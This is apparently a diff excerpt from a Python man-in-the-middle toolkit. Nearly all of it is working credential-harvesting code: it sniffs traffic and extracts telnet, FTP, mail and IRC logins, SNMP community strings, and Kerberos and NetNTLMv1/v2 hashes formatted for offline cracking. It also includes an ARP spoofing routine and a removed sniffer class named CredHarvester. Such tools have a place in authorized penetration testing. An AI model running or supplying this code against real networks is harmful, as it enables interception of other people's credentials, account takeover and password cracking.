# Create msg, the return variable
|
||||||
|
msg = 'Telnet %s: %s' % (cred_type, value)
|
||||||
|
del self.telnet_stream[src_ip_port]
|
||||||
|
self.printer(src_ip_port, dst_ip_port, msg)
|
||||||
|
|
||||||
|
# This part relies on the telnet packet ending in
|
||||||
|
# "login:", "password:", or "username:" and being <750 chars
|
||||||
|
# Haven't seen any false+ but this is pretty general
|
||||||
|
# might catch some eventually
|
||||||
|
# maybe use dissector.py telnet lib?
|
||||||
|
if len(self.telnet_stream) > 100:
|
||||||
|
self.telnet_stream.popitem(last=False)
|
||||||
|
mod_load = load.lower().strip()
|
||||||
|
if mod_load.endswith('username:') or mod_load.endswith('login:'):
|
||||||
|
self.telnet_stream[dst_ip_port] = 'username '
|
||||||
|
elif mod_load.endswith('password:'):
|
||||||
|
self.telnet_stream[dst_ip_port] = 'password '
|
||||||
|
|
||||||
|
def ParseMSKerbv5TCP(self, Data):
|
||||||
|
'''
|
||||||
|
Taken from Pcredz because I didn't want to spend the time doing this myself
|
||||||
|
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
|
||||||
|
Maybe replace this eventually with the kerberos python lib
|
||||||
|
Parses Kerberosv5 hashes from packets
|
||||||
|
'''
|
||||||
|
try:
|
||||||
|
MsgType = Data[21:22]
|
||||||
|
EncType = Data[43:44]
|
||||||
|
MessageType = Data[32:33]
|
||||||
|
except IndexError:
|
||||||
|
return
|
||||||
|
|
||||||
|
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
|
||||||
|
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
|
||||||
|
HashLen = struct.unpack('<b',Data[50:51])[0]
|
||||||
|
if HashLen == 54:
|
||||||
|
Hash = Data[53:105]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[153:154])[0]
|
||||||
|
Name = Data[154:154+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
|
||||||
|
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return 'MS Kerberos: %s' % BuildHash
|
||||||
|
|
||||||
|
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
|
||||||
|
HashLen = struct.unpack('<b',Data[47:48])[0]
|
||||||
|
Hash = Data[48:48+HashLen]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
|
||||||
|
Name = Data[HashLen+97:HashLen+97+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
|
||||||
|
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return 'MS Kerberos: %s' % BuildHash
|
||||||
|
|
||||||
|
else:
|
||||||
|
Hash = Data[48:100]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[148:149])[0]
|
||||||
|
Name = Data[149:149+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
|
||||||
|
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return 'MS Kerberos: %s' % BuildHash
|
||||||
|
|
||||||
|
def ParseMSKerbv5UDP(self, Data):
|
||||||
|
'''
|
||||||
|
Taken from Pcredz because I didn't want to spend the time doing this myself
|
||||||
|
I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
|
||||||
|
Maybe replace this eventually with the kerberos python lib
|
||||||
|
Parses Kerberosv5 hashes from packets
|
||||||
|
'''
|
||||||
|
try:
|
||||||
|
MsgType = Data[17:18]
|
||||||
|
EncType = Data[39:40]
|
||||||
|
except IndexError:
|
||||||
|
return
|
||||||
|
|
||||||
|
if MsgType == "\x0a" and EncType == "\x17":
|
||||||
|
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
|
||||||
|
HashLen = struct.unpack('<b',Data[41:42])[0]
|
||||||
|
if HashLen == 54:
|
||||||
|
Hash = Data[44:96]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[144:145])[0]
|
||||||
|
Name = Data[145:145+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
|
||||||
|
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return 'MS Kerberos: %s' % BuildHash
|
||||||
|
|
||||||
|
if HashLen == 53:
|
||||||
|
Hash = Data[44:95]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[143:144])[0]
|
||||||
|
Name = Data[144:144+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
|
||||||
|
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return 'MS Kerberos: %s' % BuildHash
|
||||||
|
|
||||||
|
else:
|
||||||
|
HashLen = struct.unpack('<b',Data[48:49])[0]
|
||||||
|
Hash = Data[49:49+HashLen]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
|
||||||
|
Name = Data[HashLen+98:HashLen+98+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
|
||||||
|
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return 'MS Kerberos: %s' % BuildHash
|
||||||
|
|
||||||
|
def Decode_Ip_Packet(self, s):
|
||||||
|
'''
|
||||||
|
Taken from PCredz, solely to get Kerb parsing
|
||||||
|
working until I have time to analyze Kerb pkts
|
||||||
|
and figure out a simpler way
|
||||||
|
Maybe use kerberos python lib
|
||||||
|
'''
|
||||||
|
d={}
|
||||||
|
d['header_len']=ord(s[0]) & 0x0f
|
||||||
|
d['data']=s[4*d['header_len']:]
|
||||||
|
return d
|
||||||
|
|
||||||
|
def double_line_checker(self, full_load, count_str):
|
||||||
|
'''
|
||||||
|
Check if count_str shows up twice
|
||||||
|
'''
|
||||||
|
num = full_load.lower().count(count_str)
|
||||||
|
if num > 1:
|
||||||
|
lines = full_load.count('\r\n')
|
||||||
|
if lines > 1:
|
||||||
|
full_load = full_load.split('\r\n')[-2] # -1 is ''
|
||||||
|
return full_load
|
||||||
|
|
||||||
|
def parse_ftp(self, full_load, dst_ip_port):
|
||||||
|
'''
|
||||||
|
Parse out FTP creds
|
||||||
|
'''
|
||||||
|
print_strs = []
|
||||||
|
|
||||||
|
# Sometimes FTP packets double up on the authentication lines
|
||||||
|
# We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
|
||||||
|
full_load = self.double_line_checker(full_load, 'USER')
|
||||||
|
|
||||||
|
# FTP and POP potentially use idential client > server auth pkts
|
||||||
|
ftp_user = re.match(self.ftp_user_re, full_load)
|
||||||
|
ftp_pass = re.match(self.ftp_pw_re, full_load)
|
||||||
|
|
||||||
|
if ftp_user:
|
||||||
|
msg1 = 'FTP User: %s' % ftp_user.group(1).strip()
|
||||||
|
print_strs.append(msg1)
|
||||||
|
if dst_ip_port[-3:] != ':21':
|
||||||
|
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
|
||||||
|
print_strs.append(msg2)
|
||||||
|
|
||||||
|
elif ftp_pass:
|
||||||
|
msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip()
|
||||||
|
print_strs.append(msg1)
|
||||||
|
if dst_ip_port[-3:] != ':21':
|
||||||
|
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
|
||||||
|
print_strs.append(msg2)
|
||||||
|
|
||||||
|
return print_strs
|
||||||
|
|
||||||
|
def mail_decode(self, src_ip_port, dst_ip_port, mail_creds):
|
||||||
|
'''
|
||||||
|
Decode base64 mail creds
|
||||||
|
'''
|
||||||
|
try:
|
||||||
|
decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
|
||||||
|
decoded = decoded.replace('\x00', ' ')
|
||||||
|
except TypeError:
|
||||||
|
decoded = None
|
||||||
|
except UnicodeDecodeError as e:
|
||||||
|
decoded = None
|
||||||
|
|
||||||
|
if decoded != None:
|
||||||
|
msg = 'Decoded: %s' % decoded
|
||||||
|
self.printer(src_ip_port, dst_ip_port, msg)
|
||||||
|
|
||||||
|
def mail_logins(self, full_load, src_ip_port, dst_ip_port, ack, seq):
|
||||||
|
'''
|
||||||
|
Catch IMAP, POP, and SMTP logins
|
||||||
|
'''
|
||||||
|
# Handle the first packet of mail authentication
|
||||||
|
# if the creds aren't in the first packet, save it in mail_auths
|
||||||
|
|
||||||
|
# mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]
|
||||||
|
|
||||||
|
found = False
|
||||||
|
|
||||||
|
# Sometimes mail packets double up on the authentication lines
|
||||||
|
# We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
|
||||||
|
full_load = self.double_line_checker(full_load, 'auth')
|
||||||
|
|
||||||
|
# Client to server 2nd+ pkt
|
||||||
|
if src_ip_port in self.mail_auths:
|
||||||
|
if seq in self.mail_auths[src_ip_port][-1]:
|
||||||
|
stripped = full_load.strip('\r\n')
|
||||||
|
try:
|
||||||
|
decoded = base64.b64decode(stripped)
|
||||||
|
msg = 'Mail authentication: %s' % decoded
|
||||||
|
self.printer(src_ip_port, dst_ip_port, msg)
|
||||||
|
except TypeError:
|
||||||
|
pass
|
||||||
|
self.mail_auths[src_ip_port].append(ack)
|
||||||
|
|
||||||
|
# Server responses to client
|
||||||
|
# seq always = last ack of tcp stream
|
||||||
|
elif dst_ip_port in self.mail_auths:
|
||||||
|
if seq in self.mail_auths[dst_ip_port][-1]:
|
||||||
|
# Look for any kind of auth failure or success
|
||||||
|
a_s = 'Authentication successful'
|
||||||
|
a_f = 'Authentication failed'
|
||||||
|
# SMTP auth was successful
|
||||||
|
if full_load.startswith('235') and 'auth' in full_load.lower():
|
||||||
|
# Reversed the dst and src
|
||||||
|
self.printer(dst_ip_port, src_ip_port, a_s)
|
||||||
|
found = True
|
||||||
|
try:
|
||||||
|
del self.mail_auths[dst_ip_port]
|
||||||
|
except KeyError:
|
||||||
|
pass
|
||||||
|
# SMTP failed
|
||||||
|
elif full_load.startswith('535 '):
|
||||||
|
# Reversed the dst and src
|
||||||
|
self.printer(dst_ip_port, src_ip_port, a_f)
|
||||||
|
found = True
|
||||||
|
try:
|
||||||
|
del self.mail_auths[dst_ip_port]
|
||||||
|
except KeyError:
|
||||||
|
pass
|
||||||
|
# IMAP/POP/SMTP failed
|
||||||
|
elif ' fail' in full_load.lower():
|
||||||
|
# Reversed the dst and src
|
||||||
|
self.printer(dst_ip_port, src_ip_port, a_f)
|
||||||
|
found = True
|
||||||
|
try:
|
||||||
|
del self.mail_auths[dst_ip_port]
|
||||||
|
except KeyError:
|
||||||
|
pass
|
||||||
|
# IMAP auth success
|
||||||
|
elif ' OK [' in full_load:
|
||||||
|
# Reversed the dst and src
|
||||||
|
self.printer(dst_ip_port, src_ip_port, a_s)
|
||||||
|
found = True
|
||||||
|
try:
|
||||||
|
del self.mail_auths[dst_ip_port]
|
||||||
|
except KeyError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
# Pkt was not an auth pass/fail so its just a normal server ack
|
||||||
|
# that it got the client's first auth pkt
|
||||||
|
else:
|
||||||
|
if len(self.mail_auths) > 100:
|
||||||
|
self.mail_auths.popitem(last=False)
|
||||||
|
self.mail_auths[dst_ip_port].append(ack)
|
||||||
|
|
||||||
|
# Client to server but it's a new TCP seq
|
||||||
|
# This handles most POP/IMAP/SMTP logins but there's at least one edge case
|
||||||
|
else:
|
||||||
|
mail_auth_search = re.match(self.mail_auth_re, full_load, re.IGNORECASE)
|
||||||
|
if mail_auth_search != None:
|
||||||
|
auth_msg = full_load
|
||||||
|
# IMAP uses the number at the beginning
|
||||||
|
if mail_auth_search.group(1) != None:
|
||||||
|
auth_msg = auth_msg.split()[1:]
|
||||||
|
else:
|
||||||
|
auth_msg = auth_msg.split()
|
||||||
|
# Check if its a pkt like AUTH PLAIN dvcmQxIQ==
|
||||||
|
# rather than just an AUTH PLAIN
|
||||||
|
if len(auth_msg) > 2:
|
||||||
|
mail_creds = ' '.join(auth_msg[2:])
|
||||||
|
msg = 'Mail authentication: %s' % mail_creds
|
||||||
|
self.printer(src_ip_port, dst_ip_port, msg)
|
||||||
|
|
||||||
|
self.mail_decode(src_ip_port, dst_ip_port, mail_creds)
|
||||||
|
try:
|
||||||
|
del self.mail_auths[src_ip_port]
|
||||||
|
except KeyError:
|
||||||
|
pass
|
||||||
|
found = True
|
||||||
|
|
||||||
|
# Mail auth regex was found and src_ip_port is not in mail_auths
|
||||||
|
# Pkt was just the initial auth cmd, next pkt from client will hold creds
|
||||||
|
if len(self.mail_auths) > 100:
|
||||||
|
self.mail_auths.popitem(last=False)
|
||||||
|
self.mail_auths[src_ip_port] = [ack]
|
||||||
|
|
||||||
|
# At least 1 mail login style doesn't fit in the original regex:
|
||||||
|
# 1 login "username" "password"
|
||||||
|
# This also catches FTP authentication!
|
||||||
|
# 230 Login successful.
|
||||||
|
elif re.match(self.mail_auth_re1, full_load, re.IGNORECASE) != None:
|
||||||
|
|
||||||
|
# FTP authentication failures trigger this
|
||||||
|
#if full_load.lower().startswith('530 login'):
|
||||||
|
# return
|
||||||
|
|
||||||
|
auth_msg = full_load
|
||||||
|
auth_msg = auth_msg.split()
|
||||||
|
if 2 < len(auth_msg) < 5:
|
||||||
|
mail_creds = ' '.join(auth_msg[2:])
|
||||||
|
msg = 'Authentication: %s' % mail_creds
|
||||||
|
self.printer(src_ip_port, dst_ip_port, msg)
|
||||||
|
self.mail_decode(src_ip_port, dst_ip_port, mail_creds)
|
||||||
|
found = True
|
||||||
|
|
||||||
|
if found == True:
|
||||||
|
return True
|
||||||
|
|
||||||
|
def irc_logins(self, full_load):
|
||||||
|
'''
|
||||||
|
Find IRC logins
|
||||||
|
'''
|
||||||
|
user_search = re.match(self.irc_user_re, full_load)
|
||||||
|
pass_search = re.match(self.irc_pw_re, full_load)
|
||||||
|
if user_search:
|
||||||
|
msg = 'IRC nick: %s' % user_search.group(1)
|
||||||
|
return msg
|
||||||
|
if pass_search:
|
||||||
|
msg = 'IRC pass: %s' % pass_search.group(1)
|
||||||
|
self.printer(src_ip_port, dst_ip_port, msg)
|
||||||
|
return pass_search
|
||||||
|
|
||||||
|
def headers_to_dict(self, header_lines):
|
||||||
|
'''
|
||||||
|
Convert the list of header lines into a dictionary
|
||||||
|
'''
|
||||||
|
headers = {}
|
||||||
|
# Incomprehensible list comprehension flattens list of headers
|
||||||
|
# that are each split at ': '
|
||||||
|
# http://stackoverflow.com/a/406296
|
||||||
|
headers_list = [x for line in header_lines for x in line.split(': ', 1)]
|
||||||
|
headers_dict = dict(zip(headers_list[0::2], headers_list[1::2]))
|
||||||
|
# Make the header key (like "Content-Length") lowercase
|
||||||
|
for header in headers_dict:
|
||||||
|
headers[header.lower()] = headers_dict[header]
|
||||||
|
|
||||||
|
return headers
|
||||||
|
|
||||||
|
def parse_http_load(self, full_load, http_methods):
|
||||||
|
'''
|
||||||
|
Split the raw load into list of headers and body string
|
||||||
|
'''
|
||||||
|
try:
|
||||||
|
headers, body = full_load.split("\r\n\r\n", 1)
|
||||||
|
except ValueError:
|
||||||
|
headers = full_load
|
||||||
|
body = ''
|
||||||
|
header_lines = headers.split("\r\n")
|
||||||
|
|
||||||
|
# Pkts may just contain hex data and no headers in which case we'll
|
||||||
|
# still want to parse them for usernames and password
|
||||||
|
http_line = self.get_http_line(header_lines, http_methods)
|
||||||
|
if not http_line:
|
||||||
|
headers = ''
|
||||||
|
body = full_load
|
||||||
|
|
||||||
|
header_lines = [line for line in header_lines if line != http_line]
|
||||||
|
|
||||||
|
return http_line, header_lines, body
|
||||||
|
|
||||||
|
def get_http_line(self, header_lines, http_methods):
|
||||||
|
'''
|
||||||
|
Get the header with the http command
|
||||||
|
'''
|
||||||
|
for header in header_lines:
|
||||||
|
for method in http_methods:
|
||||||
|
# / is the only char I can think of that's in every http_line
|
||||||
|
# Shortest valid: "GET /", add check for "/"?
|
||||||
|
if header.startswith(method):
|
||||||
|
http_line = header
|
||||||
|
return http_line
|
||||||
|
|
||||||
|
|
||||||
|
def other_parser(self, src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
|
||||||
|
|
||||||
|
#For now we will parse the HTTP headers through scapy and not through Twisted
|
||||||
|
#This will have to get changed in the future, seems a bit redundent
|
||||||
|
http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
|
||||||
|
http_line, header_lines, body = self.parse_http_load(full_load, http_methods)
|
||||||
|
headers = self.headers_to_dict(header_lines)
|
||||||
|
|
||||||
|
# Kerberos over TCP
|
||||||
|
decoded = self.Decode_Ip_Packet(str(pkt)[14:])
|
||||||
|
kerb_hash = self.ParseMSKerbv5TCP(decoded['data'][20:])
|
||||||
|
if kerb_hash:
|
||||||
|
self.printer(src_ip_port, dst_ip_port, kerb_hash)
|
||||||
|
|
||||||
|
# Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL)
|
||||||
|
NTLMSSP2 = re.search(self.NTLMSSP2_re, full_load, re.DOTALL)
|
||||||
|
NTLMSSP3 = re.search(self.NTLMSSP3_re, full_load, re.DOTALL)
|
||||||
|
if NTLMSSP2:
|
||||||
|
self.parse_ntlm_chal(NTLMSSP2.group(), ack)
|
||||||
|
if NTLMSSP3:
|
||||||
|
ntlm_resp_found = self.parse_ntlm_resp(NTLMSSP3.group(), seq)
|
||||||
|
if ntlm_resp_found != None:
|
||||||
|
self.printer(src_ip_port, dst_ip_port, ntlm_resp_found)
|
||||||
|
|
||||||
|
# Look for authentication headers
|
||||||
|
if len(headers) == 0:
|
||||||
|
authenticate_header = None
|
||||||
|
authorization_header = None
|
||||||
|
for header in headers:
|
||||||
|
authenticate_header = re.match(self.authenticate_re, header)
|
||||||
|
authorization_header = re.match(self.authorization_re, header)
|
||||||
|
if authenticate_header or authorization_header:
|
||||||
|
break
|
||||||
|
|
||||||
|
if authorization_header or authenticate_header:
|
||||||
|
# NETNTLM
|
||||||
|
netntlm_found = self.parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
|
||||||
|
if netntlm_found != None:
|
||||||
|
self.printer(src_ip_port, dst_ip_port, netntlm_found)
|
||||||
|
|
||||||
|
def parse_netntlm(self, authenticate_header, authorization_header, headers, ack, seq):
|
||||||
|
'''
|
||||||
|
Parse NTLM hashes out
|
||||||
|
'''
|
||||||
|
# Type 2 challenge from server
|
||||||
|
if authenticate_header != None:
|
||||||
|
chal_header = authenticate_header.group()
|
||||||
|
self.parse_netntlm_chal(headers, chal_header, ack)
|
||||||
|
|
||||||
|
# Type 3 response from client
|
||||||
|
elif authorization_header != None:
|
||||||
|
resp_header = authorization_header.group()
|
||||||
|
msg = self.parse_netntlm_resp_msg(headers, resp_header, seq)
|
||||||
|
if msg != None:
|
||||||
|
return msg
|
||||||
|
|
||||||
|
def parse_snmp(self, src_ip_port, dst_ip_port, snmp_layer):
|
||||||
|
'''
|
||||||
|
Parse out the SNMP version and community string
|
||||||
|
'''
|
||||||
|
if type(snmp_layer.community.val) == str:
|
||||||
|
ver = snmp_layer.version.val
|
||||||
|
msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
|
||||||
|
self.printer(src_ip_port, dst_ip_port, msg)
|
||||||
|
return True
|
||||||
|
|
||||||
|
def parse_netntlm_chal(self, headers, chal_header, ack):
|
||||||
|
'''
|
||||||
|
Parse the netntlm server challenge
|
||||||
|
https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
|
||||||
|
'''
|
||||||
|
header_val2 = headers[chal_header]
|
||||||
|
header_val2 = header_val2.split(' ', 1)
|
||||||
|
# The header value can either start with NTLM or Negotiate
|
||||||
|
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
|
||||||
|
msg2 = header_val2[1]
|
||||||
|
msg2 = base64.decodestring(msg2)
|
||||||
|
self.parse_ntlm_chal(ack, msg2)
|
||||||
|
|
||||||
|
def parse_ntlm_chal(self, msg2, ack):
|
||||||
|
'''
|
||||||
|
Parse server challenge
|
||||||
|
'''
|
||||||
|
|
||||||
|
Signature = msg2[0:8]
|
||||||
|
msg_type = struct.unpack("<I",msg2[8:12])[0]
|
||||||
|
assert(msg_type==2)
|
||||||
|
ServerChallenge = msg2[24:32].encode('hex')
|
||||||
|
|
||||||
|
# Keep the dict of ack:challenge to less than 50 chals
|
||||||
|
if len(self.challenge_acks) > 50:
|
||||||
|
self.challenge_acks.popitem(last=False)
|
||||||
|
self.challenge_acks[ack] = ServerChallenge
|
||||||
|
|
||||||
|
def parse_netntlm_resp_msg(self, headers, resp_header, seq):
|
||||||
|
'''
|
||||||
|
Parse the client response to the challenge
|
||||||
|
'''
|
||||||
|
header_val3 = headers[resp_header]
|
||||||
|
header_val3 = header_val3.split(' ', 1)
|
||||||
|
|
||||||
|
# The header value can either start with NTLM or Negotiate
|
||||||
|
if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate':
|
||||||
|
msg3 = base64.decodestring(header_val3[1])
|
||||||
|
return self.parse_ntlm_resp(msg3, seq)
|
||||||
|
|
||||||
|
def parse_ntlm_resp(self, msg3, seq):
|
||||||
|
'''
|
||||||
|
Parse the 3rd msg in NTLM handshake
|
||||||
|
Thanks to psychomario
|
||||||
|
'''
|
||||||
|
|
||||||
|
if seq in self.challenge_acks:
|
||||||
|
challenge = self.challenge_acks[seq]
|
||||||
|
else:
|
||||||
|
challenge = 'CHALLENGE NOT FOUND'
|
||||||
|
|
||||||
|
if len(msg3) > 43:
|
||||||
|
# Thx to psychomario for below
|
||||||
|
lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
|
||||||
|
lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
|
||||||
|
nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
|
||||||
|
domain = msg3[domoff:domoff+domlen].replace("\0", "")
|
||||||
|
user = msg3[useroff:useroff+userlen].replace("\0", "")
|
||||||
|
# Original check by psychomario, might be incorrect?
|
||||||
|
#if lmhash != "0"*48: #NTLMv1
|
||||||
|
if ntlen == 24: #NTLMv1
|
||||||
|
msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
|
||||||
|
return msg
|
||||||
|
elif ntlen > 60: #NTLMv2
|
||||||
|
msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
|
||||||
|
return msg
|
||||||
|
|
||||||
|
def printer(self, src_ip_port, dst_ip_port, msg):
|
||||||
|
if dst_ip_port != None:
|
||||||
|
print_str = '[%s --> %s] %s%s%s' % (src_ip_port, dst_ip_port, T, msg, W)
|
||||||
|
# All credentials will have dst_ip_port, URLs will not
|
||||||
|
logging.info(print_str)
|
||||||
|
else:
|
||||||
|
print_str = '[%s] %s' % (src_ip_port.split(':')[0], msg)
|
||||||
|
logging.info(print_str)
|
134
plugins/Spoof.py
134
plugins/Spoof.py
|
@ -361,137 +361,3 @@ class Spoof(Plugin):
|
||||||
print '[*] Re-arping network'
|
print '[*] Re-arping network'
|
||||||
pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.gateway, hwsrc=self.routermac, op=2)
|
pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.gateway, hwsrc=self.routermac, op=2)
|
||||||
sendp(pkt, inter=1, count=5, iface=self.interface)
|
sendp(pkt, inter=1, count=5, iface=self.interface)
|
||||||
|
|
||||||
class CredHarvester():
|
|
||||||
|
|
||||||
fragged = 0
|
|
||||||
imapauth = 0
|
|
||||||
popauth = 0
|
|
||||||
ftpuser = None # Necessary since user and pass come in separate packets
|
|
||||||
ircnick = None # Necessary since user and pass come in separate packets
|
|
||||||
# For concatenating fragmented packets
|
|
||||||
prev_pkt = {6667:{}, # IRC
|
|
||||||
143:{}, # IMAP
|
|
||||||
110:{}, # POP3
|
|
||||||
26:{}, # SMTP
|
|
||||||
25:{}, # SMTP
|
|
||||||
21:{}} # FTP
|
|
||||||
|
|
||||||
def start(self, interface):
|
|
||||||
sniff(prn=self.pkt_sorter, iface=interface)
|
|
||||||
|
|
||||||
def pkt_sorter(self, pkt):
|
|
||||||
if pkt.haslayer(Raw) and pkt.haslayer(TCP):
|
|
||||||
self.dest = pkt[IP].dst
|
|
||||||
self.src = pkt[IP].src
|
|
||||||
self.dport = pkt[TCP].dport
|
|
||||||
self.sport = pkt[TCP].sport
|
|
||||||
self.ack = pkt[TCP].ack
|
|
||||||
self.seq = pkt[TCP].seq
|
|
||||||
self.load = str(pkt[Raw].load)
|
|
||||||
|
|
||||||
if self.dport == 6667:
|
|
||||||
""" IRC """
|
|
||||||
port = 6667
|
|
||||||
self.header_lines = self.hb_parse(port) # Join fragmented pkts
|
|
||||||
return self.irc(port)
|
|
||||||
|
|
||||||
elif self.dport == 21 or self.sport == 21:
|
|
||||||
""" FTP """
|
|
||||||
port = 21
|
|
||||||
self.prev_pkt[port] = self.frag_joiner(port) # No headers in FTP so no need for hb_parse
|
|
||||||
self.ftp(port)
|
|
||||||
|
|
||||||
elif self.sport == 110 or self.dport == 110:
|
|
||||||
""" POP3 """
|
|
||||||
port = 110
|
|
||||||
self.header_lines = self.hb_parse(port) # Join fragmented pkts
|
|
||||||
self.mail_pw(port)
|
|
||||||
|
|
||||||
elif self.sport == 143 or self.dport == 143:
|
|
||||||
""" IMAP """
|
|
||||||
port = 143
|
|
||||||
self.header_lines = self.hb_parse(port) # Join fragmented pkts
|
|
||||||
self.mail_pw(port)
|
|
||||||
|
|
||||||
def headers_body(self, protocol):
|
|
||||||
try:
|
|
||||||
h, b = protocol.split("\r\n\r\n", 1)
|
|
||||||
return h, b
|
|
||||||
except Exception:
|
|
||||||
h, b = protocol, ''
|
|
||||||
return h, b
|
|
||||||
|
|
||||||
def frag_joiner(self, port):
|
|
||||||
self.fragged = 0
|
|
||||||
if len(self.prev_pkt[port]) > 0:
|
|
||||||
if self.ack in self.prev_pkt[port]:
|
|
||||||
self.fragged = 1
|
|
||||||
return {self.ack:self.prev_pkt[port][self.ack]+self.load}
|
|
||||||
return {self.ack:self.load}
|
|
||||||
|
|
||||||
def hb_parse(self, port):
|
|
||||||
self.prev_pkt[port] = self.frag_joiner(port)
|
|
||||||
self.headers, self.body = self.headers_body(self.prev_pkt[port][self.ack])
|
|
||||||
return self.headers.split('\r\n')
|
|
||||||
|
|
||||||
def mail_pw(self, port):
|
|
||||||
load = self.load.strip('\r\n')
|
|
||||||
|
|
||||||
if self.dport == 143:
|
|
||||||
auth_find = 'authenticate plain'
|
|
||||||
proto = 'IMAP'
|
|
||||||
auth = self.imapauth
|
|
||||||
self.imapauth = self.mail_pw_auth(load, auth_find, proto, auth, port)
|
|
||||||
|
|
||||||
elif self.dport == 110:
|
|
||||||
auth_find = 'AUTH PLAIN'
|
|
||||||
proto = 'POP'
|
|
||||||
auth = self.popauth
|
|
||||||
self.popauth = self.mail_pw_auth(load, auth_find, proto, auth, port)
|
|
||||||
|
|
||||||
def mail_pw_auth(self, load, auth_find, proto, auth, port):
|
|
||||||
if auth == 1:
|
|
||||||
user, pw = load, 0
|
|
||||||
logging.warning('[%s] %s auth: %s' % (self.src, proto, load))
|
|
||||||
self.b64decode(load, port)
|
|
||||||
return 0
|
|
||||||
|
|
||||||
elif auth_find in load:
|
|
||||||
return 1
|
|
||||||
|
|
||||||
def b64decode(self, load, port):
|
|
||||||
b64str = load
|
|
||||||
try:
|
|
||||||
decoded = b64decode(b64str).replace('\x00', ' ')[1:] # delete space at beginning
|
|
||||||
except Exception:
|
|
||||||
decoded = ''
|
|
||||||
# Test to see if decode worked
|
|
||||||
if '@' in decoded:
|
|
||||||
logging.debug('%s Decoded: %s' % (self.src, decoded))
|
|
||||||
decoded = decoded.split()
|
|
||||||
|
|
||||||
def ftp(self, port):
|
|
||||||
"""Catch FTP usernames, passwords, and servers"""
|
|
||||||
load = self.load.replace('\r\n', '')
|
|
||||||
|
|
||||||
if port == self.dport:
|
|
||||||
if 'USER ' in load:
|
|
||||||
user = load.strip('USER ')
|
|
||||||
logging.warning('[%s > %s] FTP user: ' % (self.src, self.dest), user)
|
|
||||||
self.ftpuser = user
|
|
||||||
|
